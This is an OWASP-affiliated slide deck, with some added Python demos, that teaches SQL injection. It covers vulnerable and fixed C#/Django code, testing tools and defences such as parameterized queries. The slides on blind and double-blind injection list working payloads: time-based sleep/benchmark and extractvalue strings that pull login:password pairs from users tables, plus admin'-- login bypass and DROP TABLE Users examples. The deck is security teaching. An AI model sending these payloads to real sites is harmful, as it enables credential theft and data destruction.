Hack through Injections
![Page 1: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/1.jpg)
Hacking through Injections.
Theory and practice
By Nazar Tymoshyk, SoftServe; OWASP-LVIV.blogspot.com
Specially for IT-Weekend Lviv
![Page 2: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/2.jpg)
Agenda
Theory:
• CODE problems
• Impact
• How to find
• How to prevent
Practice:
• Small hack
• References
• Training Lab
![Page 3: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/3.jpg)
What do you see in this request?
GET /api/shop/discount?shopId=3&productId=1584&coupon=1y3z9 HTTP/1.1
Host: superdupershop.com
Cookie: ASP.NET_SessionId=10g5o4zjkmbd2i552d5j3255;.ASPXAUTH=f2d345118221742ee0316d4080a53af014eb8a3161db421d36aa6a86ffea6781b5584f4157ec85ae5956cfc54cc93c34a3f9449c8ef4c70b5b54d46e0def3677cce9a8105340b8ccc6c8e64dfa37ae953f987517
![Page 4: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/4.jpg)
What is SQL Injection?
Unauthorized database access by an external source using specially crafted code to piggyback on standard user input to bypass normal protections.
Why?
• Gain access to restricted website areas
• Query unauthorized data
• Delete or corrupt data
What is at stake:
• User accounts, credentials, and personal information
• Descriptions and prices of goods for sale
• Orders, account statements, and payment details
• The privileges of each user within the application
![Page 5: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/5.jpg)
This is a real problem and it’s dangerous
• DoS
• Data loss or corruption
• Data leakage
• Sometimes can lead to complete host takeover
• Reputation can be harmed.
![Page 7: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/7.jpg)
SQL-i
SELECT * FROM users WHERE username = 'marcus' AND password = 'secret'
INJECT: admin'--
SELECT * FROM users WHERE username = 'admin' -- ' AND password = 'foo'
Everything after -- is a comment, so the password check never runs and the database actually evaluates:
SELECT * FROM users WHERE username = 'admin'
![Page 8: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/8.jpg)
Consequences
![Page 9: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/9.jpg)
![Page 10: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/10.jpg)
Training Lab
• DVWA
• Gruyere
• WebGoat .Net
• WebGoat Java
• https://xss-game.appspot.com/
• OWASP Mutillidae II
• OWASP Broken Web Applications Project
• https://www.hacking-lab.com
![Page 11: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/11.jpg)
Aha, here is the source code for the first request
var shopId = Request["shopId"];
var productId = Request["productId"];
var coupon = Request["coupon"];
var couponPattern = string.Format("{0}-{1}-{2}", shopId, productId, coupon);
// Vulnerable: the raw coupon value is formatted straight into the SQL text, unquoted and unparameterized
var sqlCommandTxt = string.Format("SELECT value FROM Discounts WHERE coupon LIKE {0}", coupon);
var cmd = new SqlCommand(sqlCommandTxt, dataConnection);
// Execute query, process result etc...
![Page 12: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/12.jpg)
Let's Fix this code.
var shopId = Request["shopId"];
var productId = Request["productId"];
var coupon = Request["coupon"];
var couponPattern = string.Format("{0}-{1}-{2}", shopId, productId, coupon);
// The user-controlled pattern is now passed as a parameter instead of being formatted into the SQL text
var cmd = new SqlCommand("SELECT * FROM Discounts WHERE coupon LIKE @couponPattern", dataConnection);
cmd.Parameters.Add(new SqlParameter("@couponPattern", couponPattern));
// Execute query, process result etc...
Is it fixed? Not quite. The parameter stops any SQL syntax from being injected, but the comparison is still LIKE, and LIKE treats % and _ inside the parameter value as wildcards: a coupon of % turns couponPattern into "3-1584-%" and matches every coupon for that shop and product.
![Page 13: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/13.jpg)
Now it's fixed
using System;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

var shopId = 0;
if (!int.TryParse(Request["shopId"], out shopId))
{
    throw new ArgumentException("shopId must be an integer");
}
var productId = 0;
if (!int.TryParse(Request["productId"], out productId))
{
    throw new ArgumentException("productId must be an integer");
}
var coupon = Request["coupon"];
if (coupon == null || !Regex.IsMatch(coupon, "^[A-Za-z0-9]{5}$"))
{
    throw new ArgumentException("coupon must be exactly 5 alphanumeric characters");
}
var couponPattern = string.Format("{0}-{1}-{2}", shopId, productId, coupon);
// Every field is whitelisted and the comparison is an exact = rather than LIKE,
// so neither SQL syntax nor % / _ wildcards can reach the query
var cmd = new SqlCommand("SELECT * FROM Discounts WHERE coupon = @couponPattern", dataConnection);
cmd.Parameters.Add(new SqlParameter("@couponPattern", couponPattern));
// Execute query, process result etc...
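To see the difference between the "Let's fix this" version and the final one concretely, here is an added example that is not code from the deck: it runs both versions of the Discounts query in Python against an in-memory SQLite database. The three Discounts rows, the make_db helper and the function names are constructed for illustration; the whitelist regex and the "shopId-productId-coupon" key format are the slide's own.

```python
import re
import sqlite3

# Constructed sample rows for the Discounts table (not data from the slides);
# the key format "shopId-productId-coupon" mirrors couponPattern on the slide.
SAMPLE_DISCOUNTS = [
    ("3-1584-1y3z9", 10),
    ("3-1584-k7q2p", 25),
    ("7-42-zz9ab", 50),
]

# Same whitelist the final slide applies: exactly five alphanumerics
COUPON_RE = re.compile(r"^[A-Za-z0-9]{5}$")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Discounts (coupon TEXT, value INTEGER)")
    conn.executemany("INSERT INTO Discounts VALUES (?, ?)", SAMPLE_DISCOUNTS)
    return conn


def discount_parameterized_like(conn, shop_id, product_id, coupon):
    """The 'Let's fix this' version: parameterized, so no SQL syntax can be
    injected, but the value is still matched with LIKE, so % and _ inside it
    are live wildcards."""
    pattern = "{0}-{1}-{2}".format(shop_id, product_id, coupon)
    rows = conn.execute(
        "SELECT value FROM Discounts WHERE coupon LIKE ?", (pattern,)
    ).fetchall()
    return sorted(r[0] for r in rows)


def discount_validated(conn, shop_id, product_id, coupon):
    """The 'Now it's fixed' version: whitelist every field, then compare with =."""
    try:
        shop_id = int(shop_id)
        product_id = int(product_id)
    except (TypeError, ValueError):
        raise ValueError("shopId and productId must be integers")
    if not isinstance(coupon, str) or not COUPON_RE.match(coupon):
        raise ValueError("coupon must be exactly five alphanumeric characters")
    pattern = "{0}-{1}-{2}".format(shop_id, product_id, coupon)
    rows = conn.execute(
        "SELECT value FROM Discounts WHERE coupon = ?", (pattern,)
    ).fetchall()
    return sorted(r[0] for r in rows)


if __name__ == "__main__":
    db = make_db()
    print(discount_parameterized_like(db, "3", "1584", "1y3z9"))  # the one intended row
    print(discount_parameterized_like(db, "3", "1584", "%"))      # wildcard: every coupon for shop 3 / product 1584
    print(discount_parameterized_like(db, "%", "%", "%"))         # wildcard in every field: the whole table
    print(discount_validated(db, "3", "1584", "1y3z9"))           # still the one intended row
    try:
        discount_validated(db, "3", "1584", "%")
    except ValueError as exc:
        print("rejected:", exc)                                   # wildcard never reaches the database
```

The point is that parameterization and validation answer different questions: the placeholder guarantees the value is never parsed as SQL, while the whitelist and the exact = guarantee the value cannot change which rows a legitimate query matches.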
![Page 14: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/14.jpg)
Python Code
import MySQLdb
from django.http import Http404
from django.shortcuts import render_to_response
from django.template import RequestContext

def book_search_view(request):
    if 'bookname' not in request.GET:
        raise Http404
    conn = MySQLdb.connect(host="localhost", user="testuser", passwd="testpass", db="test")
    cursor = conn.cursor()
    name = request.GET['bookname']
    # Vulnerable: the raw bookname is formatted into the SQL text with %
    cursor.execute("SELECT * FROM table_books WHERE book_name = '%s'" % name)
    row = cursor.fetchone()
    cursor.close()
    conn.close()
    return render_to_response('booklist.html', row, context_instance=RequestContext(request))
![Page 15: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/15.jpg)
A small problem
• Normal SQL: name="Moby Dick"
SELECT * FROM table_books WHERE book_name = 'Moby Dick'
• SQL Injection – bad day: name="1'; SELECT * from Users; --"
SELECT * FROM table_books WHERE book_name = '1'; SELECT * from Users; --'
• SQL Injection 2 – really bad day: name="1'; DROP TABLE Users; --"
SELECT * FROM table_books WHERE book_name = '1'; DROP TABLE Users; --'
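An added example, not from the slides, that covers both the login bypass from the SQL-i slide and the book_search_view above, in Python against an in-memory SQLite database. The users and table_books rows, the make_db helper and the function names are constructed. Python's sqlite3 refuses stacked statements, so the slide's "1'; DROP TABLE Users; --" cannot be reproduced with it (whether stacked queries run depends on the driver; MySQLdb enables multi-statement support by default, which is why the slide's payload is realistic there). The block therefore uses a UNION payload to show the same data leakage through a single statement.

```python
import sqlite3

# Constructed sample data (not from the slides)
USERS = [("marcus", "secret"), ("admin", "hunter2")]
BOOKS = [("Moby Dick", 12.5), ("Dune", 9.99)]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("CREATE TABLE table_books (book_name TEXT, price REAL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.executemany("INSERT INTO table_books VALUES (?, ?)", BOOKS)
    return conn


def login_vulnerable(conn, username, password):
    """String-built query from the SQL-i slide: the username can close the
    quote and comment out the password check."""
    sql = "SELECT * FROM users WHERE username = '%s' AND password = '%s'" % (username, password)
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    """Same query with placeholders: the driver sends the values separately,
    so admin'-- is looked up literally as a username and matches nothing."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def book_search_vulnerable(conn, name):
    """The book_search_view query with %-formatting, as on the slide."""
    sql = "SELECT * FROM table_books WHERE book_name = '%s'" % name
    return conn.execute(sql).fetchall()


def book_search_parameterized(conn, name):
    """The same query with a placeholder."""
    return conn.execute(
        "SELECT * FROM table_books WHERE book_name = ?", (name,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    # The SQL-i slide's payload: admin'-- turns the WHERE clause into username = 'admin'
    print(login_vulnerable(db, "admin'--", "foo"))          # True: logged in without a password
    print(login_parameterized(db, "admin'--", "foo"))       # False
    # A UNION instead of the slide's stacked query: both users rows come back as "books"
    leak = "1' UNION SELECT username, password FROM users --"
    print(book_search_vulnerable(db, leak))                 # the users table, not a book
    print(book_search_parameterized(db, leak))              # []
```

Note that the driver refusing stacked statements is not a defence: the UNION payload reads the users table through one perfectly ordinary SELECT, and the only change that stops it is the placeholder.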
![Page 16: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/16.jpg)
Java Code
![Page 17: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/17.jpg)
Detection Techniques
![Page 18: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/18.jpg)
TOOLS
1. sqlmap: automatic SQL injection and database takeover tool
2. SQL Inject Me :: Add-ons for Firefox
3. Zed Attack Proxy
4. Burp Suite
5. W3AF
6. Wapiti
7. Havij Pro
8. Nikto
9. IronWASP
![Page 19: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/19.jpg)
DEMO 2
Testing security tools:
•SQL Map
•Burp Suite
![Page 20: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/20.jpg)
MANUAL Penetration Testing
In-band:
• Error
• Union
Out-of-band:
• DNS
• Ping
Inferential (Blind):
• Sleep
• Waitfor
![Page 21: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/21.jpg)
This is an old problem: BLIND
• sleep%281%29%2b1%29%20limit%201%20--
• sleep(1)+1) limit 1 --
• 1+and+sleep(10)--
• 1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),1,1)))='a',sleep(10),1)--
• 1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),1,1)))='2',sleep(10),1)--
• +OR+1=1--
• +union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns--
• +union+select+concat_ws(0x3a,id,login,password,name)+from+users--
• +AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+limit+0,1)))--
• +AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+0,1)))--
• +AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+3,1)))--
• +AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+4,1)))--
• +AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,login,password)+from+users1+limit+0,1)))--
![Page 22: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/22.jpg)
The first step in this test is to understand when the application interacts with a DB Server in order to access some data.
Typical examples of cases when an application needs to talk to a DB include:
1. Authentication forms: when authentication is performed using a web form, chances are that the user credentials are checked against a database that contains all usernames and passwords (or, better, password hashes).
2. Search engines: the string submitted by the user could be used in a SQL query that extracts all relevant records from a database.
3. E-Commerce sites: the products and their characteristics (price, description, availability, etc) are very likely to be stored in a database.
![Page 23: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/23.jpg)
Prevention
![Page 24: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/24.jpg)
General approaches to SQL Injection Defense
Primary Defenses:
Option #1: Use of Prepared Statements (Parameterized Queries)
Option #2: Use of Stored Procedures
Option #3: Escaping all User Supplied Input
Additional Defenses:
Also Enforce: Least Privilege
Also Perform: White List Input Validation
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
![Page 25: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/25.jpg)
Where to Learn more
• http://www.pluralsight.com/courses/web-security-owasp-top10-big-picture
• http://www.pluralsight.com/courses/owasp-top10-aspdotnet-application-security-risks
• http://www.irongeek.com/i.php?page=security/hackingillustrated
• http://google-gruyere.appspot.com/
• https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)
![Page 26: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/26.jpg)
http://OWASP-LVIV.blogspot.com
![Page 27: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/27.jpg)
Thank you
Contact me:
Nazar Tymoshyk
Skype: root_nt
Gmail: [email protected] http://OWASP-LVIV.blogspot.com
![Page 28: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/28.jpg)
Blind SQL injections
http://site/?param=-1 OR 1=1
http://site/?param=-1 OR 1=1--
...
http://site/?param=-1'
http://site/?param=-1' AND 1=2
...
http://site/?param=-1' OR '1'='1
...
http://site/?param=-1"/*
...
http://site/?param=2
http://site/?param=1
http://site/?param=2-1
...
http://site/?param=1' AND 1=1
http://site/?param=1' AND '1'='1
![Page 29: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/29.jpg)
Double Blind SQL-i
• http://site/?param=-1 AND benchmark(2000,md5(now()))
• ...
• http://site/?param=-1' AND benchmark(2000,md5(now()))--
![Page 30: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/30.jpg)
Escape User Input
• Hard to do right
• You'll probably screw it up if you don't cover all the cases
• So don't write your own regex
• MySQLdb.escape_string
  • Pro: Handles almost all encoding evasions
  • Con: Error prone because it depends on humans to always use it
![Page 31: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/31.jpg)
import MySQLdb
from django.http import Http404
from django.shortcuts import render_to_response
from django.template import RequestContext

def book_search_view(request):
    if 'bookname' not in request.GET:
        raise Http404
    conn = MySQLdb.connect(host="localhost", user="testuser", passwd="testpass", db="test")
    cursor = conn.cursor()
    # Escaped before being formatted into the query: a quote in the input becomes \'
    name = MySQLdb.escape_string(request.GET['bookname'])
    cursor.execute("SELECT * FROM table_books WHERE book_name = '%s'" % name)
    row = cursor.fetchone()
    cursor.close()
    conn.close()
    return render_to_response('booklist.html', row, context_instance=RequestContext(request))
![Page 32: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/32.jpg)
What does the escaped version look like?
• SQL Injection – bad day: name="1'; SELECT * from Users; --"
SELECT * FROM table_books WHERE book_name = '1\'; SELECT * from Users; --'
• SQL Injection 2 – really bad day: name="1'; DROP TABLE Users; --"
SELECT * FROM table_books WHERE book_name = '1\'; DROP TABLE Users; --'
The escaped quote no longer terminates the literal, so the whole payload is compared as one (non-existent) book name.
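The escaped queries above show why escaping works for a quoted string. The added example below, not from the slides, shows its limit: escaping only protects the context it was written for. The helper escape_sql_string is a constructed stand-in that doubles single quotes (standard SQL, which SQLite understands) rather than MySQLdb.escape_string's backslash escaping; the table_books rows, the make_db helper and the function names are constructed as well.

```python
import sqlite3

# Constructed sample rows (not from the slides)
BOOKS = [(1, "Moby Dick"), (2, "Dune"), (3, "Finnegan's Wake")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE table_books (id INTEGER, book_name TEXT)")
    conn.executemany("INSERT INTO table_books VALUES (?, ?)", BOOKS)
    return conn


def escape_sql_string(value):
    """Standard-SQL escaping: double every single quote. Constructed helper;
    SQLite does not recognise the backslash escapes MySQLdb.escape_string
    produces, but the lesson is the same."""
    return str(value).replace("'", "''")


def search_by_name(conn, name):
    """Escaping does its job here: the value sits between single quotes, so the
    only character that could end the literal has been neutralised."""
    sql = "SELECT id, book_name FROM table_books WHERE book_name = '%s'" % escape_sql_string(name)
    return conn.execute(sql).fetchall()


def search_by_id(conn, book_id):
    """Escaping is worthless here: the value is not inside quotes, so there is
    nothing to escape and '1 OR 1=1' is simply valid SQL."""
    sql = "SELECT id, book_name FROM table_books WHERE id = %s" % escape_sql_string(book_id)
    return conn.execute(sql).fetchall()


def search_by_id_parameterized(conn, book_id):
    """A placeholder is context-free: whatever the value contains, it is
    compared as a single value and never parsed as SQL."""
    return conn.execute(
        "SELECT id, book_name FROM table_books WHERE id = ?", (book_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(search_by_name(db, "Finnegan's Wake"))      # legitimate quote handled: one row
    print(search_by_name(db, "1' OR '1'='1"))          # [] : payload stays inside the literal
    print(search_by_id(db, "1 OR 1=1"))                # every row: escaping had nothing to escape
    print(search_by_id_parameterized(db, "1 OR 1=1"))  # [] : compared as a value, not parsed
```

This is the concrete form of "error prone because it depends on humans": the developer must know, at every call site, whether the value lands in a quoted context, an unquoted numeric context, an identifier, or a LIKE pattern, and pick the right escaping for each. A placeholder removes that decision.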
![Page 33: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/33.jpg)
Evasion Techniques
http://www.f5.com/pdf/white-papers/sql-injection-detection-wp.pdf
![Page 34: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/34.jpg)
Even more Evasion Techniques
• Multibyte attacks
• http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
• http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html
• Even the experts don't get it right
• MySQL patches bugs in their escaping routines
![Page 35: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/35.jpg)
White List
• Scrub data to a known set of inputs
• Pros
  • Works well for variables with limited range
  • Fast
• Cons
  • Can only be used in customized locations
  • Error prone: you might forget, or the intern might not understand
• Example: user id must only contain 6 numbers
![Page 36: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/36.jpg)
Stored Procedures
• Use the inherent stored procedure capabilities
• Pros
  • Forces parameterization of all user input
• Cons
  • Can still be bypassed if the SQL string is generated in code and passed to the stored procedure
  • Not portable between databases
![Page 37: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/37.jpg)
Parameterized Queries
• Use the DB API (MySQLdb cursor.execute with parameters) properly
• Use the Django ORM
• Use SQLAlchemy (Pylons, Flask)
  • You really have to work hard to expose yourself
• Pros
  • Generally easier to model data
• Cons
  • ORMs sometimes limit advanced SQL
• Bottom line: use a framework!
![Page 38: Hack through Injections](https://reader034.fdocuments.us/reader034/viewer/2022042522/559a2d9a1a28abea758b47a3/html5/thumbnails/38.jpg)
MySQLdb.execute
Bad: cursor.execute("SELECT * FROM table_books WHERE book_name = '%s'" % name)
Good: cursor.execute("SELECT * FROM table_books WHERE book_name = %s", (name,))
Seriously?
Yes. The whole difference is the comma: with % Python formats the value into the SQL text before the driver ever sees it, while with a comma the value is handed to the driver, which quotes and escapes it itself (so the placeholder gets no quotes of its own).